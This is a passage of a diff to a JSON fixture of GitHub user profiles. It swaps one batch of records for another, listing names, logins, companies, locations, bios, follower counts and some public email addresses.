"updated_at": "2024-06-04T10:08:00Z", + "node_id": "MDQ6VXNlcjYxMDgxOTI0", + "bio": "A Computer Enthusiast with a keen interest in the fields of Artificial Intelligence and Security.\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "AshfaqueBushra" } }, { "model": "github.user", - "pk": 3131, + "pk": 8526, "fields": { - "nest_created_at": "2024-09-12T03:14:38.486Z", - "nest_updated_at": "2024-09-12T03:14:38.486Z", - "name": "koooooooooh", - "login": "RASSec", + "nest_created_at": "2024-09-22T10:44:15.106Z", + "nest_updated_at": "2024-09-22T20:29:25.313Z", + "name": "Advik Singhania", + "login": "adviksinghania", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16720863?v=4", - "company": "063", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72959852?v=4", + "company": "LNMIIT, Jaipur", + "location": "Kanpur, India", "collaborators_count": 0, - "following_count": 72, - "followers_count": 270, - "public_gists_count": 19, - "public_repositories_count": 1269, - "created_at": "2016-01-15T14:32:03Z", - "updated_at": "2023-10-09T13:45:17Z", - "node_id": "MDQ6VXNlcjE2NzIwODYz", - "bio": "", + "following_count": 25, + "followers_count": 59, + "public_gists_count": 4, + "public_repositories_count": 32, + "created_at": "2020-10-16T04:23:34Z", + "updated_at": "2024-09-13T18:05:35Z", + "node_id": "MDQ6VXNlcjcyOTU5ODUy", + "bio": "I'm a student pursuing my career in Computer Sciences. Learning Python, C and C++ and like to tinker with Arduino, CircuitPython and Raspberry Pi.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "SinghaniaAdvik" } }, { "model": "github.user", - "pk": 3132, + "pk": 8527, "fields": { - "nest_created_at": "2024-09-12T03:14:40.096Z", - "nest_updated_at": "2024-09-12T03:14:40.096Z", - "name": "Atharva Ketkar", - "login": "atharvak95", + "nest_created_at": "2024-09-22T10:44:16.073Z", + "nest_updated_at": "2024-09-22T20:29:26.272Z", + "name": "Mohd Shaad Khan", + "login": "moshaad7", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85757680?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65341373?v=4", + "company": "SWE@couchbase", + "location": "Bangalore, India", "collaborators_count": 0, - "following_count": 5, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-06-11T16:36:57Z", - "updated_at": "2024-07-16T22:00:53Z", - "node_id": "MDQ6VXNlcjg1NzU3Njgw", + "following_count": 13, + "followers_count": 3, + "public_gists_count": 6, + "public_repositories_count": 8, + "created_at": "2020-05-14T10:08:10Z", + "updated_at": "2024-05-10T17:00:24Z", + "node_id": "MDQ6VXNlcjY1MzQxMzcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438553,74 +699102,74 @@ }, { "model": "github.user", - "pk": 3133, + "pk": 8528, "fields": { - "nest_created_at": "2024-09-12T03:14:40.911Z", - "nest_updated_at": "2024-09-12T03:14:40.911Z", - "name": "", - "login": "sahadev0079", + "nest_created_at": "2024-09-22T10:44:16.387Z", + "nest_updated_at": "2024-09-22T20:29:26.588Z", + "name": "Aman Rawat", + "login": "theamanrawat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111126595?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/35992750?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 14, + "followers_count": 18, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2022-08-12T11:45:43Z", - "updated_at": "2024-08-28T09:27:15Z", - "node_id": "U_kgDOBp-oQw", - "bio": "", + "public_repositories_count": 23, + "created_at": "2018-01-31T09:03:02Z", + "updated_at": "2024-09-13T06:43:53Z", + "node_id": "MDQ6VXNlcjM1OTkyNzUw", + "bio": "I am NOOB in computer world ;)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3134, + "pk": 8529, "fields": { - "nest_created_at": "2024-09-12T03:14:41.753Z", - "nest_updated_at": "2024-09-12T03:14:41.753Z", - "name": "Ricardo Iramar dos Santos", - "login": "riramar", - "email": "ricardo.iramar@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6748242?v=4", + "nest_created_at": "2024-09-22T10:44:16.739Z", + "nest_updated_at": "2024-09-22T20:29:26.899Z", + "name": "0xComposure", + "login": "0xcomposure", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9446825?v=4", "company": "", - "location": "", + "location": "/dev/null", "collaborators_count": 0, - "following_count": 53, - "followers_count": 328, + "following_count": 24, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 37, - "created_at": "2014-02-21T13:38:07Z", - "updated_at": "2024-01-28T20:01:14Z", - "node_id": "MDQ6VXNlcjY3NDgyNDI=", - "bio": "Every time count is regressive.", - "is_hireable": false, + "public_repositories_count": 6, + "created_at": "2014-10-29T12:31:38Z", + "updated_at": "2023-11-15T18:39:35Z", + "node_id": "MDQ6VXNlcjk0NDY4MjU=", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3135, + "pk": 8530, "fields": { - "nest_created_at": "2024-09-12T03:14:42.587Z", - "nest_updated_at": "2024-09-12T03:14:42.587Z", + "nest_created_at": "2024-09-22T10:44:17.084Z", + "nest_updated_at": "2024-09-22T20:29:27.212Z", "name": "", - "login": "Croco-byte", + "login": "Grogu22", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/74874716?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/83173038?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 5, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 36, - "created_at": "2020-11-22T18:27:09Z", - "updated_at": "2024-06-26T21:27:26Z", - "node_id": "MDQ6VXNlcjc0ODc0NzE2", + "public_repositories_count": 23, + "created_at": "2021-04-25T14:20:30Z", + "updated_at": "2024-09-17T15:12:55Z", + "node_id": "MDQ6VXNlcjgzMTczMDM4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438628,124 +699177,249 @@ }, { "model": "github.user", - "pk": 3136, + "pk": 8531, "fields": { - "nest_created_at": "2024-09-12T03:14:43.434Z", - "nest_updated_at": "2024-09-12T03:14:43.434Z", - "name": "Cedric Brisson", - "login": "cyb3rjerry", + "nest_created_at": "2024-09-22T10:44:18.035Z", + "nest_updated_at": "2024-09-22T20:29:28.204Z", + "name": "Sanjiban Sengupta", + "login": "sanjibansg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/92945113?v=4", - "company": "Coveo", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40017007?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 53, - "followers_count": 7, + "following_count": 200, + "followers_count": 126, + "public_gists_count": 1, + "public_repositories_count": 90, + "created_at": "2018-06-07T05:50:39Z", + "updated_at": "2024-09-12T00:53:57Z", + "node_id": "MDQ6VXNlcjQwMDE3MDA3", + "bio": "Machine Learning : Web | Prev: @voltrondata @root-project \r\n@cisco @nimbleboxai @economizecloud @cadenceiq @Campus-24 ", + "is_hireable": true, + "twitter_username": "sanjibansg" + } +}, +{ + "model": "github.user", + "pk": 8532, + "fields": { + "nest_created_at": "2024-09-22T10:44:18.349Z", + "nest_updated_at": "2024-09-22T20:29:28.525Z", + "name": "", + "login": "X0RW3LL", + "email": "x0rw3ll@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/53377798?v=4", + "company": "", + "location": "Kuiper Belt", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 25, "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2021-10-21T17:29:05Z", - "updated_at": "2024-09-04T22:12:31Z", - "node_id": "U_kgDOBYo62Q", - "bio": "Breaker of things", - "is_hireable": false, + "public_repositories_count": 22, + "created_at": "2019-07-27T16:57:34Z", + "updated_at": "2024-06-30T21:44:27Z", + "node_id": "MDQ6VXNlcjUzMzc3Nzk4", + "bio": "I talk to computers", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3137, + "pk": 8533, "fields": { - "nest_created_at": "2024-09-12T03:14:44.257Z", - "nest_updated_at": "2024-09-12T03:14:44.257Z", - "name": "ELderblood", - "login": "ReekElderblood", + "nest_created_at": "2024-09-22T10:44:25.873Z", + "nest_updated_at": "2024-09-22T20:29:35.236Z", + "name": "Naoki KIMURA", + "login": "naokikimura", + "email": "n.kimura.cap@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2765097?v=4", + "company": "@Iqilu-inc", + "location": "Japan", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 46, + "created_at": "2012-11-10T09:35:21Z", + "updated_at": "2024-09-17T02:24:00Z", + "node_id": "MDQ6VXNlcjI3NjUwOTc=", + "bio": "@moneyforward @Kyash @gaudiy @Iqilu-inc @josanshes @simplee-inc\r\n", + "is_hireable": true, + "twitter_username": "naokikimura" + } +}, +{ + "model": "github.user", + "pk": 8534, + "fields": { + "nest_created_at": "2024-09-22T10:44:26.498Z", + "nest_updated_at": "2024-09-22T20:29:35.879Z", + "name": "Vladimir", + "login": "ManWhoLaughs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87793589?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33401168?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 8, + "following_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2021-07-22T03:26:37Z", - "updated_at": "2024-08-22T07:48:59Z", - "node_id": "MDQ6VXNlcjg3NzkzNTg5", - "bio": "programmer proficient in Bash, HTML, and Python. Passionate about writing clean, efficient code and constantly improving my skills.", + "public_repositories_count": 8, + "created_at": "2017-11-05T19:27:17Z", + "updated_at": "2024-05-02T20:18:14Z", + "node_id": "MDQ6VXNlcjMzNDAxMTY4", + "bio": "", "is_hireable": false, - "twitter_username": "ReekElderblood" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3138, + "pk": 8535, "fields": { - "nest_created_at": "2024-09-12T03:14:45.122Z", - "nest_updated_at": "2024-09-12T03:14:45.122Z", + "nest_created_at": "2024-09-22T10:44:26.815Z", + "nest_updated_at": "2024-09-22T20:29:36.200Z", "name": "", - "login": "fuomag9", + "login": "shirinnikita", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1580624?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16850868?v=4", "company": "", - "location": "Italy", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 28, - "public_gists_count": 12, - "public_repositories_count": 45, - "created_at": "2012-03-27T17:45:24Z", - "updated_at": "2024-08-30T21:41:01Z", - "node_id": "MDQ6VXNlcjE1ODA2MjQ=", - "bio": "Pizza developer", - "is_hireable": true, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2016-01-23T10:36:11Z", + "updated_at": "2022-03-13T11:52:48Z", + "node_id": "MDQ6VXNlcjE2ODUwODY4", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3139, + "pk": 8536, "fields": { - "nest_created_at": "2024-09-12T03:14:45.972Z", - "nest_updated_at": "2024-09-12T03:14:45.972Z", - "name": "Maxim Tyukov", - "login": "mfocuz", - "email": "mtyukov@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5272766?v=4", - "company": "", + "nest_created_at": "2024-09-22T10:44:27.128Z", + "nest_updated_at": "2024-09-22T20:29:36.512Z", + "name": "David Black", + "login": "dbaxa", + "email": "dblack@atlassian.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1684354?v=4", + "company": "Atlassian", + "location": "Sydney", + "collaborators_count": 0, + "following_count": 127, + "followers_count": 75, + "public_gists_count": 1, + "public_repositories_count": 109, + "created_at": "2012-04-27T07:03:53Z", + "updated_at": "2024-05-21T00:47:01Z", + "node_id": "MDQ6VXNlcjE2ODQzNTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8537, + "fields": { + "nest_created_at": "2024-09-22T10:44:27.474Z", + "nest_updated_at": "2024-09-22T20:29:36.829Z", + "name": "Brad Flood", + "login": "bradflood", + "email": "bflood@keyholesoftware.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1403755?v=4", + "company": "Keyhole Software", + "location": "Kansas City, USA", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 17, + "public_repositories_count": 60, + "created_at": "2012-02-03T01:18:00Z", + "updated_at": "2024-08-15T17:13:41Z", + "node_id": "MDQ6VXNlcjE0MDM3NTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8538, + "fields": { + "nest_created_at": "2024-09-22T10:44:27.792Z", + "nest_updated_at": "2024-09-22T20:29:37.143Z", + "name": "WenyuanXu", + "login": "Anemone95", + "email": "wyxu95@foxmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4996660?v=4", + "company": "AarhusUni", + "location": "Aarhus, Denmark", + "collaborators_count": 0, + "following_count": 126, + "followers_count": 149, + "public_gists_count": 4, + "public_repositories_count": 123, + "created_at": "2013-07-12T11:23:42Z", + "updated_at": "2024-08-30T11:23:24Z", + "node_id": "MDQ6VXNlcjQ5OTY2NjA=", + "bio": "I'm very vegetable.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8539, + "fields": { + "nest_created_at": "2024-09-22T10:44:28.109Z", + "nest_updated_at": "2024-09-22T20:29:37.467Z", + "name": "Joe Stephens", + "login": "j-s-3", + "email": "jstephens@sonatype.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13700083?v=4", + "company": "@sonatype", "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 15, + "following_count": 13, + "followers_count": 6, "public_gists_count": 3, - "public_repositories_count": 7, - "created_at": "2013-08-20T19:36:01Z", - "updated_at": "2024-08-22T17:24:05Z", - "node_id": "MDQ6VXNlcjUyNzI3NjY=", - "bio": "Security researcher, CTF player, OSCP & OSWE", + "public_repositories_count": 16, + "created_at": "2015-08-07T21:21:36Z", + "updated_at": "2024-08-01T19:58:20Z", + "node_id": "MDQ6VXNlcjEzNzAwMDgz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3140, + "pk": 8540, "fields": { - "nest_created_at": "2024-09-12T03:14:46.779Z", - "nest_updated_at": "2024-09-12T03:14:46.779Z", - "name": "", - "login": "ntriisii", + "nest_created_at": "2024-09-22T10:44:28.462Z", + "nest_updated_at": "2024-09-22T20:29:37.791Z", + "name": "Guillaume Toison", + "login": "gtoison", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/137733641?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/86775455?v=4", "company": "", - "location": "", + "location": "France", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-06-25T23:14:28Z", - "updated_at": "2023-10-12T19:21:30Z", - "node_id": "U_kgDOCDWmCQ", + "public_repositories_count": 27, + "created_at": "2021-07-01T09:44:28Z", + "updated_at": "2024-08-31T15:17:58Z", + "node_id": "MDQ6VXNlcjg2Nzc1NDU1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438753,24 +699427,24 @@ }, { "model": "github.user", - "pk": 3141, + "pk": 8541, "fields": { - "nest_created_at": "2024-09-12T03:14:47.639Z", - "nest_updated_at": "2024-09-12T03:14:47.639Z", - "name": "", - "login": "prathvi2002", + "nest_created_at": "2024-09-22T10:44:29.082Z", + "nest_updated_at": "2024-09-22T20:29:38.424Z", + "name": "John Hawes", + "login": "johnhawes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109508964?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26771667?v=4", "company": "", - "location": "", + "location": "Austin, TX", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2022-07-18T07:44:56Z", - "updated_at": "2024-09-09T14:30:24Z", - "node_id": "U_kgDOBob5ZA", + "public_repositories_count": 3, + "created_at": "2017-03-29T15:23:53Z", + "updated_at": "2024-09-18T20:19:25Z", + "node_id": "MDQ6VXNlcjI2NzcxNjY3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438778,49 +699452,74 @@ }, { "model": "github.user", - "pk": 3142, + "pk": 8542, "fields": { - "nest_created_at": "2024-09-12T03:14:49.263Z", - "nest_updated_at": "2024-09-12T03:14:49.263Z", - "name": "Pushpak Pawar", - "login": "pushpak-11", - "email": "pawarpushpak36@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/98308258?v=4", - "company": "", - "location": "pune maharashtra", + "nest_created_at": "2024-09-22T10:44:30.036Z", + "nest_updated_at": "2024-09-22T20:29:39.366Z", + "name": "Samuel Reed", + "login": "samuelreed", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1017865?v=4", + "company": "Vallation Security Inc.", + "location": "San Francisco, CA", "collaborators_count": 0, - "following_count": 7, - "followers_count": 11, + "following_count": 9, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2022-01-24T07:42:29Z", - "updated_at": "2024-08-09T12:22:56Z", - "node_id": "U_kgDOBdwQog", - "bio": "| MERN Stack Developer | Next.js | React.js | Redux.js | TypeScript | JavaScript | Node.js | Express | Website Penetration Testing | ", + "public_repositories_count": 3, + "created_at": "2011-08-31T20:38:46Z", + "updated_at": "2024-09-12T02:15:13Z", + "node_id": "MDQ6VXNlcjEwMTc4NjU=", + "bio": "", "is_hireable": false, - "twitter_username": "PushpakPawar_11" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3143, + "pk": 8543, "fields": { - "nest_created_at": "2024-09-12T03:14:50.908Z", - "nest_updated_at": "2024-09-12T03:14:50.908Z", - "name": "", - "login": "DuyVuong", + "nest_created_at": "2024-09-22T10:44:30.374Z", + "nest_updated_at": "2024-09-22T20:29:39.707Z", + "name": "Paulo Lopes", + "login": "pmlopes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/125139802?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/849467?v=4", + "company": "Spotify", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 386, + "public_gists_count": 18, + "public_repositories_count": 84, + "created_at": "2011-06-14T13:43:27Z", + "updated_at": "2024-09-05T11:25:17Z", + "node_id": "MDQ6VXNlcjg0OTQ2Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "pml0p35" + } +}, +{ + "model": "github.user", + "pk": 8544, + "fields": { + "nest_created_at": "2024-09-22T10:44:30.711Z", + "nest_updated_at": "2024-09-22T20:29:40.013Z", + "name": "Judit Knoll", + "login": "JuditKnoll", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/123470644?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 5, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2023-02-11T14:47:46Z", - "updated_at": "2024-09-05T16:51:24Z", - "node_id": "U_kgDOB3V7Wg", + "public_repositories_count": 6, + "created_at": "2023-01-24T12:36:47Z", + "updated_at": "2024-09-02T08:49:03Z", + "node_id": "U_kgDOB1wDNA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438828,24 +699527,49 @@ }, { "model": "github.user", - "pk": 3144, + "pk": 8545, "fields": { - "nest_created_at": "2024-09-12T03:14:51.725Z", - "nest_updated_at": "2024-09-12T03:14:51.725Z", + "nest_created_at": "2024-09-22T10:44:31.026Z", + "nest_updated_at": "2024-09-22T20:29:40.322Z", + "name": "Eduardo R. B. Marques", + "login": "edrdo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1699245?v=4", + "company": "Faculdade de Ciências da Universidade do Porto", + "location": "Porto, Portugal", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 31, + "public_gists_count": 13, + "public_repositories_count": 33, + "created_at": "2012-05-02T14:42:49Z", + "updated_at": "2024-09-05T11:18:27Z", + "node_id": "MDQ6VXNlcjE2OTkyNDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8546, + "fields": { + "nest_created_at": "2024-09-22T10:44:31.664Z", + "nest_updated_at": "2024-09-22T20:29:40.953Z", "name": "", - "login": "peteraao", + "login": "oxeye-gal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/135830083?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/97847098?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-06-07T10:55:55Z", - "updated_at": "2023-10-18T07:28:08Z", - "node_id": "U_kgDOCBiaQw", + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2022-01-16T17:34:54Z", + "updated_at": "2022-08-23T08:59:40Z", + "node_id": "U_kgDOBdUHOg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438853,24 +699577,24 @@ }, { "model": "github.user", - "pk": 3145, + "pk": 8547, "fields": { - "nest_created_at": "2024-09-12T03:14:52.542Z", - "nest_updated_at": "2024-09-18T19:13:33.430Z", - "name": "", - "login": "gata-bbs", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/148156217?v=4", + "nest_created_at": "2024-09-22T10:44:31.980Z", + "nest_updated_at": "2024-09-22T20:29:41.265Z", + "name": "Yoshiyuki Kanno", + "login": "orihalcon128", + "email": "yk.38726@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7869858?v=4", "company": "", - "location": "", + "location": "Tokyo, Japan", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-10-16T21:32:14Z", - "updated_at": "2024-09-12T14:48:52Z", - "node_id": "U_kgDOCNSvOQ", + "public_repositories_count": 2, + "created_at": "2014-06-12T11:16:53Z", + "updated_at": "2024-04-14T22:59:48Z", + "node_id": "MDQ6VXNlcjc4Njk4NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438878,99 +699602,99 @@ }, { "model": "github.user", - "pk": 3146, + "pk": 8548, "fields": { - "nest_created_at": "2024-09-12T03:14:53.401Z", - "nest_updated_at": "2024-09-12T03:14:53.401Z", - "name": "Hashem Mohamed", - "login": "hashem-mo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107648396?v=4", + "nest_created_at": "2024-09-22T10:44:33.247Z", + "nest_updated_at": "2024-09-22T20:29:42.549Z", + "name": "David Handermann", + "login": "exceptionfactory", + "email": "exceptionfactory@apache.org", + "avatar_url": "https://avatars.githubusercontent.com/u/20425862?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 16, - "followers_count": 1, + "following_count": 0, + "followers_count": 24, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2022-06-16T19:50:54Z", - "updated_at": "2024-08-17T02:37:05Z", - "node_id": "U_kgDOBmqVjA", + "public_repositories_count": 29, + "created_at": "2016-07-12T18:44:26Z", + "updated_at": "2024-08-06T12:44:46Z", + "node_id": "MDQ6VXNlcjIwNDI1ODYy", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "exceptionfactry" } }, { "model": "github.user", - "pk": 3147, + "pk": 8549, "fields": { - "nest_created_at": "2024-09-12T03:14:54.220Z", - "nest_updated_at": "2024-09-12T03:14:54.220Z", - "name": "Ludovic ROLAND", - "login": "ludovicroland", - "email": "ludovic.c.roland@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3648438?v=4", - "company": "Decathlon Technology", - "location": "Lille", + "nest_created_at": "2024-09-22T10:44:33.566Z", + "nest_updated_at": "2024-09-22T20:29:42.858Z", + "name": "Richard Bradley", + "login": "RichardBradley", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1265780?v=4", + "company": "http://www.softwire.com", + "location": "London & Darlington", "collaborators_count": 0, - "following_count": 14, - "followers_count": 83, - "public_gists_count": 18, - "public_repositories_count": 49, - "created_at": "2013-02-20T14:46:48Z", - "updated_at": "2024-09-01T17:25:45Z", - "node_id": "MDQ6VXNlcjM2NDg0Mzg=", - "bio": "Engineering Manager @Decathlon", + "following_count": 1, + "followers_count": 27, + "public_gists_count": 7, + "public_repositories_count": 74, + "created_at": "2011-12-15T15:23:58Z", + "updated_at": "2024-02-01T12:47:25Z", + "node_id": "MDQ6VXNlcjEyNjU3ODA=", + "bio": "", "is_hireable": false, - "twitter_username": "ludovicroland" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3148, + "pk": 8550, "fields": { - "nest_created_at": "2024-09-12T03:14:55.011Z", - "nest_updated_at": "2024-09-12T03:14:57.480Z", - "name": "m0uka", - "login": "m0uka-Dz", - "email": "ahmedsadam633@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/80654458?v=4", - "company": "", - "location": "algeria", + "nest_created_at": "2024-09-22T10:44:33.903Z", + "nest_updated_at": "2024-09-22T20:29:43.191Z", + "name": "Olivier Bilodeau", + "login": "obilodeau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/546325?v=4", + "company": "GoSecure", + "location": "Montreal, Canada", "collaborators_count": 0, - "following_count": 7, - "followers_count": 29, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-03-15T00:06:06Z", - "updated_at": "2024-08-21T05:56:07Z", - "node_id": "MDQ6VXNlcjgwNjU0NDU4", + "following_count": 27, + "followers_count": 225, + "public_gists_count": 41, + "public_repositories_count": 73, + "created_at": "2011-01-04T01:41:19Z", + "updated_at": "2024-09-17T15:28:39Z", + "node_id": "MDQ6VXNlcjU0NjMyNQ==", "bio": "", "is_hireable": false, - "twitter_username": "m0uka_Dz" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3149, + "pk": 8551, "fields": { - "nest_created_at": "2024-09-12T03:14:55.843Z", - "nest_updated_at": "2024-09-12T03:14:55.843Z", + "nest_created_at": "2024-09-22T10:44:34.248Z", + "nest_updated_at": "2024-09-22T20:29:43.503Z", "name": "", - "login": "leogoldim", + "login": "mzcu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12822299?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1144995?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-06-10T01:07:31Z", - "updated_at": "2024-01-30T00:58:25Z", - "node_id": "MDQ6VXNlcjEyODIyMjk5", + "following_count": 9, + "followers_count": 2, + "public_gists_count": 4, + "public_repositories_count": 19, + "created_at": "2011-10-22T13:41:01Z", + "updated_at": "2024-04-06T20:54:48Z", + "node_id": "MDQ6VXNlcjExNDQ5OTU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -438978,14 +699702,14 @@ }, { "model": "github.user", - "pk": 3150, + "pk": 8552, "fields": { - "nest_created_at": "2024-09-12T03:14:56.672Z", - "nest_updated_at": "2024-09-12T03:14:56.672Z", + "nest_created_at": "2024-09-22T10:44:34.573Z", + "nest_updated_at": "2024-09-22T20:29:43.818Z", "name": "", - "login": "Done461", + "login": "michael-apptornado", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52113967?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/864117?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -438993,9 +699717,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2019-06-22T21:29:04Z", - "updated_at": "2024-06-01T17:34:24Z", - "node_id": "MDQ6VXNlcjUyMTEzOTY3", + "created_at": "2011-06-21T12:03:15Z", + "updated_at": "2017-05-05T06:03:09Z", + "node_id": "MDQ6VXNlcjg2NDExNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439003,24 +699727,24 @@ }, { "model": "github.user", - "pk": 3151, + "pk": 8553, "fields": { - "nest_created_at": "2024-09-12T03:14:58.342Z", - "nest_updated_at": "2024-09-12T03:14:58.342Z", - "name": "", - "login": "midjarmaksor", + "nest_created_at": "2024-09-22T10:44:34.889Z", + "nest_updated_at": "2024-09-22T20:29:44.212Z", + "name": "Marie-Claire Willig", + "login": "mcwww", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/46574468?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11687881?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2019-01-10T18:29:27Z", - "updated_at": "2024-06-06T23:26:19Z", - "node_id": "MDQ6VXNlcjQ2NTc0NDY4", + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-03-27T23:35:54Z", + "updated_at": "2024-01-16T13:23:37Z", + "node_id": "MDQ6VXNlcjExNjg3ODgx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439028,74 +699752,124 @@ }, { "model": "github.user", - "pk": 3152, + "pk": 8554, "fields": { - "nest_created_at": "2024-09-12T03:14:59.171Z", - "nest_updated_at": "2024-09-12T03:14:59.171Z", - "name": "", - "login": "kz0ltan", + "nest_created_at": "2024-09-22T10:44:35.203Z", + "nest_updated_at": "2024-09-22T20:29:44.527Z", + "name": "Karan Bansal", + "login": "karanb192", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37075997?v=4", + "avatar_url": 